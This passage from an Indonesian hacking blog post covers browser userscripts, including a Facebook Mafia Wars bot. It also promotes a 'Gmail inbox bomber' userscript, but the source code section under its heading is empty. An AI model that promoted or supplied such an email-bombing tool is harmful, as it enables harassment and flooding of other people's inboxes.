- Bot untuk MafiaWars di Facebook (biar maennya otomatis, kita gak perlu maen, biarkan bot itu yang mengerjakannya ^_^)
- dan lain-lain, liat aja di userscripts.org
Browser yang Support User Script:
- Opera: Secara Default udah ada...
- Mozilla Firefox: Pake Add-Ons Greasemonkey
- Internet Explorer, Google Chrome, Safari: Tanya om google tentang add-onsnya
Taukah anda bahwa kita bisa memakai UserScript untuk hal yang sangat MENGERIKAN! Hahahahahaha!!!
Misalnya: Windows bisa macet gara-gara buka tab terus, atau yang kita bicarakan sekarang, yaitu: INBOX GMAIL BOMBER (Bikin-bikin ndiri namanya... ^_^)
OK, source code didapat dari SpyroKiD pastinyah!!!
SOURCE CODE
Yea, segitu aja dulu yea...
OK, Stay on your channel in darknezzhacker.co.cc
There's more tips and trick or tutorial in Darkness Hacker...
So stay Hacking! ;)
---END---
Sumber: spyrozone.net
Langganan:
Postingan (Atom)
